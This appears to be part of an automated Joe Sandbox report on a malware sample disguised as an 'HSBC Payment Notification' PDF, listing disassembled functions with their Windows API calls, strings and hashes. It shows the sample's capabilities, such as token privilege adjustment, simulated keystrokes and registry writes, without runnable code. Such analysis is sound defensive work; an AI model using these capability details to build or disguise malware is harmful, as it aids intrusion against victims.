                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                    • Opcode ID: e773ed0fc7729b9169f680fa1de34ef865221b9da9dcd97c8130435d8c76d727
                                                                                                                                                    • Instruction ID: ce4a24e6abd2e21217132ac75fdd41ada253dafd3fad5be23ea40353781421a4
                                                                                                                                                    • Opcode Fuzzy Hash: e773ed0fc7729b9169f680fa1de34ef865221b9da9dcd97c8130435d8c76d727
                                                                                                                                                    • Instruction Fuzzy Hash: 8CD097A2E0C210D6DE089E28AC4DD3D3649968C2E03C80A07BF03C6019D620C400CFB7
                                                                                                                                                    Function 00AC1588 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346722465.0000000000ABF000.00000040.00000020.00020000.00000000.sdmp, Offset: 00ABF000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_abf000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Sleep
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                    • Instruction ID: d01232a9c21b76ad3d0fbc66ffee26019a9724c11971d48a24ba585d0451a274
                                                                                                                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                    • Instruction Fuzzy Hash: FBE0E67494010DDFDB00DFB4D5496DD7BB4EF04301F100265FD02D2280D6309E508A62
                                                                                                                                                    Function 02F15BC0 Relevance: 1.3, APIs: 1, Instructions: 9memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,02F14F02,00000060), ref: 02F15BD3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                    • Opcode ID: 7b81bc91e02cbd90697341b6a7a86b4d85449314a3ad1a57fdbd9e9a0e096485
                                                                                                                                                    • Instruction ID: 82ce1dd4ae1607a01432f3c9a49d00ca4f24f627855e17d7c456df425b8996a1
                                                                                                                                                    • Opcode Fuzzy Hash: 7b81bc91e02cbd90697341b6a7a86b4d85449314a3ad1a57fdbd9e9a0e096485
                                                                                                                                                    • Instruction Fuzzy Hash: 3FC092F8EC8368AEFD3A9658588EFA97B245780BA5FC44540B319994E1D7B120A0D609

                                                                                                                                                    Non-executed Functions

                                                                                                                                                    Function 0048CABC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 632windowkeyboardCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                                                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0048CB37
                                                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CB95
                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0048CBD6
                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CC00
                                                                                                                                                    • SendMessageW.USER32 ref: 0048CC29
                                                                                                                                                    • _wcsncpy.LIBCMT ref: 0048CC95
                                                                                                                                                    • GetKeyState.USER32(00000011), ref: 0048CCB6
                                                                                                                                                    • GetKeyState.USER32(00000009), ref: 0048CCC3
                                                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CCD9
                                                                                                                                                    • GetKeyState.USER32(00000010), ref: 0048CCE3
                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CD0C
                                                                                                                                                    • SendMessageW.USER32 ref: 0048CD33
                                                                                                                                                    • SendMessageW.USER32(?,00001030,?,0048B348), ref: 0048CE37
                                                                                                                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0048CE4D
                                                                                                                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0048CE60
                                                                                                                                                    • SetCapture.USER32(?), ref: 0048CE69
                                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 0048CECE
                                                                                                                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0048CEDB
                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0048CEF5
                                                                                                                                                    • ReleaseCapture.USER32 ref: 0048CF00
                                                                                                                                                    • GetCursorPos.USER32(?), ref: 0048CF3A
                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0048CF47
                                                                                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0048CFA3
                                                                                                                                                    • SendMessageW.USER32 ref: 0048CFD1
                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D00E
                                                                                                                                                    • SendMessageW.USER32 ref: 0048D03D
                                                                                                                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0048D05E
                                                                                                                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0048D06D
                                                                                                                                                    • GetCursorPos.USER32(?), ref: 0048D08D
                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0048D09A
                                                                                                                                                    • GetParent.USER32(?), ref: 0048D0BA
                                                                                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0048D123
                                                                                                                                                    • SendMessageW.USER32 ref: 0048D154
                                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 0048D1B2
                                                                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0048D1E2
                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D20C
                                                                                                                                                    • SendMessageW.USER32 ref: 0048D22F
                                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 0048D281
                                                                                                                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0048D2B5
                                                                                                                                                      • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0048D351
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                                                    • String ID: @GUI_DRAGID$F$pbL
                                                                                                                                                    • API String ID: 3977979337-2097280626
                                                                                                                                                    • Opcode ID: 7eec303b30a7e05565a51c011a33495ec48739f70336c03353c9e9cc797f9edd
                                                                                                                                                    • Instruction ID: aa2ec0652ddf211ac3aa7531e5acae26c7b16f0e73498be5a03c601873f34f9f
                                                                                                                                                    • Opcode Fuzzy Hash: 7eec303b30a7e05565a51c011a33495ec48739f70336c03353c9e9cc797f9edd
                                                                                                                                                    • Instruction Fuzzy Hash: FE42DE74604640AFC720EF24D888EAEBBE5FF48310F140A2EF559973A1C735E855DB6A
                                                                                                                                                    Function 00416F9E Relevance: 55.8, APIs: 19, Strings: 10, Instructions: 5018COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove$_memset
                                                                                                                                                    • String ID: ]K$3cA$DEFINE$P\K$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_A
                                                                                                                                                    • API String ID: 1357608183-1426331590
                                                                                                                                                    • Opcode ID: b28a790e45669a4902d64bf1598fd7c3bcb7bf2305bb98875f8069baf6f44106
                                                                                                                                                    • Instruction ID: 24ac3008a4780d7342888deeabfce4e0a58b67e9339f094d14e98286774badb8
                                                                                                                                                    • Opcode Fuzzy Hash: b28a790e45669a4902d64bf1598fd7c3bcb7bf2305bb98875f8069baf6f44106
                                                                                                                                                    • Instruction Fuzzy Hash: A193A471A002199BDB24CF58C8817EEB7B1FF48315F24815BED45AB392E7789D86CB48
                                                                                                                                                    Function 004048D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetForegroundWindow.USER32(00000000,?), ref: 004048DF
                                                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0043D665
                                                                                                                                                    • IsIconic.USER32(?), ref: 0043D66E
                                                                                                                                                    • ShowWindow.USER32(?,00000009), ref: 0043D67B
                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 0043D685
                                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0043D69B
                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0043D6A2
                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043D6AE
                                                                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6BF
                                                                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6C7
                                                                                                                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 0043D6CF
                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 0043D6D2
                                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6E7
                                                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 0043D6F2
                                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6FC
                                                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 0043D701
                                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D70A
                                                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 0043D70F
                                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D719
                                                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 0043D71E
                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 0043D721
                                                                                                                                                    • AttachThreadInput.USER32(?,?,00000000), ref: 0043D748
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                                                    • API String ID: 4125248594-2988720461
                                                                                                                                                    • Opcode ID: c65cf632393a49513bea40c5a00901192d62317a1410f3ef3d84c68e5820f373
                                                                                                                                                    • Instruction ID: c1ca6a344bcdfaba0e974823023d667c19296b4d148af4653ab9434bf50545cf
                                                                                                                                                    • Opcode Fuzzy Hash: c65cf632393a49513bea40c5a00901192d62317a1410f3ef3d84c68e5820f373
                                                                                                                                                    • Instruction Fuzzy Hash: AE319671A40318BBEB206F619C49F7F7F6CEB48B50F10443AFA04EA1D1D6B45D11ABA9
                                                                                                                                                    Function 00458310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                                                                                                                                                      • Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                                                                                                                                                      • Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865
                                                                                                                                                    • _memset.LIBCMT ref: 00458353
                                                                                                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004583A5
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 004583B6
                                                                                                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004583CD
                                                                                                                                                    • GetProcessWindowStation.USER32 ref: 004583E6
                                                                                                                                                    • SetProcessWindowStation.USER32(00000000), ref: 004583F0
                                                                                                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0045840A
                                                                                                                                                      • Part of subcall function 004581CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
                                                                                                                                                      • Part of subcall function 004581CB: CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                                                    • String ID: $default$winsta0
                                                                                                                                                    • API String ID: 2063423040-1027155976
                                                                                                                                                    • Opcode ID: 6388ce5f88c963af8a849a756f99d6c3c13203fa5580aefd9d0f359e2798b7ca
                                                                                                                                                    • Instruction ID: 3323b63beeccf06d974511bf231c05544c13643482a2b8641c754c26865e528a
                                                                                                                                                    • Opcode Fuzzy Hash: 6388ce5f88c963af8a849a756f99d6c3c13203fa5580aefd9d0f359e2798b7ca
                                                                                                                                                    • Instruction Fuzzy Hash: F3814871900209BFDF119FA5DC45AEE7B78AF08305F14416EFC10B6262EF399A19DB28
                                                                                                                                                    Function 0046C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0046C78D
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0046C7E1
                                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C806
                                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C81D
                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0046C844
                                                                                                                                                    • __swprintf.LIBCMT ref: 0046C890
                                                                                                                                                    • __swprintf.LIBCMT ref: 0046C8D3
                                                                                                                                                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                    • __swprintf.LIBCMT ref: 0046C927
                                                                                                                                                      • Part of subcall function 00423698: __woutput_l.LIBCMT ref: 004236F1
                                                                                                                                                    • __swprintf.LIBCMT ref: 0046C975
                                                                                                                                                      • Part of subcall function 00423698: __flsbuf.LIBCMT ref: 00423713
                                                                                                                                                      • Part of subcall function 00423698: __flsbuf.LIBCMT ref: 0042372B
                                                                                                                                                    • __swprintf.LIBCMT ref: 0046C9C4
                                                                                                                                                    • __swprintf.LIBCMT ref: 0046CA13
                                                                                                                                                    • __swprintf.LIBCMT ref: 0046CA62
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                                                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                                                    • API String ID: 3953360268-2428617273
                                                                                                                                                    • Opcode ID: 77525ac0cfac28e2ae67cd84ccd41d374f9895f2458c58216a587ca322c69e5f
                                                                                                                                                    • Instruction ID: 7d9c3182f1c50569ad22dcb29b7867164fdd6ce968260aea251e7ba13e5350ae
                                                                                                                                                    • Opcode Fuzzy Hash: 77525ac0cfac28e2ae67cd84ccd41d374f9895f2458c58216a587ca322c69e5f
                                                                                                                                                    • Instruction Fuzzy Hash: AFA13EB1504304ABC710EFA5C885DAFB7ECFF94708F40492EF585D6192EA38DA08CB66
                                                                                                                                                    Function 0046EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0046EFB6
                                                                                                                                                    • _wcscmp.LIBCMT ref: 0046EFCB
                                                                                                                                                    • _wcscmp.LIBCMT ref: 0046EFE2
                                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 0046EFF4
                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 0046F00E
                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0046F026
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0046F031
                                                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0046F04D
                                                                                                                                                    • _wcscmp.LIBCMT ref: 0046F074
                                                                                                                                                    • _wcscmp.LIBCMT ref: 0046F08B
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0046F09D
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F0BB
                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F0C5
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0046F0D2
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0046F0E4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                    • String ID: *.*
                                                                                                                                                    • API String ID: 1803514871-438819550
                                                                                                                                                    • Opcode ID: 6ca42bdee5e764a2d4c938babfd9147ccfee36eb28773e9f100ec5c7d0d625b2
                                                                                                                                                    • Instruction ID: e0d4b25dfa95f140917fd6c0b332215adfde449a0ea65fd213ed944f24ec6cf3
                                                                                                                                                    • Opcode Fuzzy Hash: 6ca42bdee5e764a2d4c938babfd9147ccfee36eb28773e9f100ec5c7d0d625b2
                                                                                                                                                    • Instruction Fuzzy Hash: EC31E7325011187ADF14EFA4EC48AEF77AC9F44360F10057BE844D2191EB79DA88CB6E
                                                                                                                                                    Function 00480857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00480953
                                                                                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,0048F910,00000000,?,00000000,?,?), ref: 004809C1
                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00480A09
                                                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00480A92
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00480DB2
                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00480DBF
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Close$ConnectCreateRegistryValue
                                                                                                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                    • API String ID: 536824911-966354055
                                                                                                                                                    • Opcode ID: 3505478b3485744cc1070ec7f7eb5efd5be3945e855373bd555d4648a7c47e02
                                                                                                                                                    • Instruction ID: 75f0257f13d9dd97868b06569ad7b6a65722ecc89240c550ead6eefe92fcdcfb
                                                                                                                                                    • Opcode Fuzzy Hash: 3505478b3485744cc1070ec7f7eb5efd5be3945e855373bd555d4648a7c47e02
                                                                                                                                                    • Instruction Fuzzy Hash: 3E023A756106119FCB54EF15D841E2AB7E5FF89314F04886EF8899B3A2CB38EC45CB89
                                                                                                                                                    Function 004166E1 Relevance: 25.9, Strings: 20, Instructions: 889COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
